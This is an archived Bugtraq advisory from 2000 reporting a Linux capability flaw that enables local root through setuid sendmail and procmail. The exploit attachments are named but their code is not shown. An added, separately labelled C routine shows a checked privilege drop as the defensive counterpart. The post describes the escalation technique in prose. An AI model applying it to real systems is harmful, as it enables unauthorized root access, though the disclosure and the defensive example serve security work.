[15293] in bugtraq


Sendmail & procmail local root exploits on Linux kernel up to

daemon@ATHENA.MIT.EDU (Wojciech Purczynski)
Sat Jun 10 04:16:31 2000

Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-187401051-160577840-960533976=:3475"
Message-Id:  <Pine.LNX.4.21.0006090852340.3475-300000@alfa.elzabsoft.pl>
Date:         Fri, 9 Jun 2000 08:59:36 +0200
Reply-To: Wojciech Purczynski <wp@ELZABSOFT.PL>
From: Wojciech Purczynski <wp@ELZABSOFT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM


---187401051-160577840-960533976=:3475
Content-Type: TEXT/PLAIN; charset=US-ASCII


A few days ago, while I was coding my kernel module, I discovered a problem
with the Linux capability model. My idea was to drop the inheritable capability
set as a non-root user and then execute some setuid-root program that would
be unable to drop its privileges.

I wrote two versions of proof-of-concept exploits. The day after, I
contacted the Linux and sendmail developers. They created patches that have
been available since yesterday. The procmail developers have been contacted
as well, since procmail is also affected by this kernel bug.

Exploits are attached to this message.

-wp

+--------------------------------------------------------------------+
| Wojciech Purczynski   wp@elzabsoft.pl  http://www.elzabsoft.pl/~wp |
| GSM: +48604432981   Linux Administrator   SMS: wp-sms@elzabsoft.pl |
+------ Public GnuPG Key:  http://www.elzabsoft.pl/~wp/gpg.asc ------+

---187401051-160577840-960533976=:3475
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=smlnx
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0006090859360.3475@alfa.elzabsoft.pl>
Content-Description: sendmail exploit
Content-Disposition: attachment; filename=smlnx

---187401051-160577840-960533976=:3475
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=prlnx
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0006090859361.3475@alfa.elzabsoft.pl>
Content-Description: sendmail & procmail exploit
Content-Disposition: attachment; filename=prlnx

---187401051-160577840-960533976=:3475--
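The defender's counterpart to the mechanism described in the message, as an added example that is not from the posting nor from sendmail or procmail: a privilege-drop routine that treats a failed setuid()/setgid() as fatal and verifies the drop afterwards, so a process whose CAP_SETUID has been stripped cannot be left running as root unnoticed. The function name drop_privileges is assumed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Added example (not from the posting): drop privileges and verify it.
 * The pattern the report abuses is a setuid-root program calling
 * setuid(getuid()) without checking the result; with CAP_SETUID removed
 * that call fails and the program silently keeps running as root.
 * Returns 0 on success, -1 on failure with errno set. */
int drop_privileges(uid_t uid, gid_t gid)
{
    uid_t ru, eu, su;
    gid_t rg, eg, sg;

    /* Supplementary groups first; only root may clear them. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    /* gid before uid: once the uid is dropped, changing gid is no longer allowed. */
    if (setgid(gid) != 0)
        return -1;
    /* The check a setuid program needs here: a failed setuid() must be fatal. */
    if (setuid(uid) != 0)
        return -1;

    /* Verify real, effective and saved ids all changed (no saved-id residue). */
    if (getresuid(&ru, &eu, &su) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return -1;
    if (ru != uid || eu != uid || su != uid || rg != gid || eg != gid || sg != gid) {
        errno = EPERM;
        return -1;
    }
    /* After leaving root, regaining it must be impossible. */
    if (uid != 0 && setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Stand-alone demo: drop to the invoking user's real ids and report. */
int main(void)
{
    if (drop_privileges(getuid(), getgid()) != 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("running as uid %u, gid %u\n", (unsigned)geteuid(), (unsigned)getegid());
    return 0;
}
```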
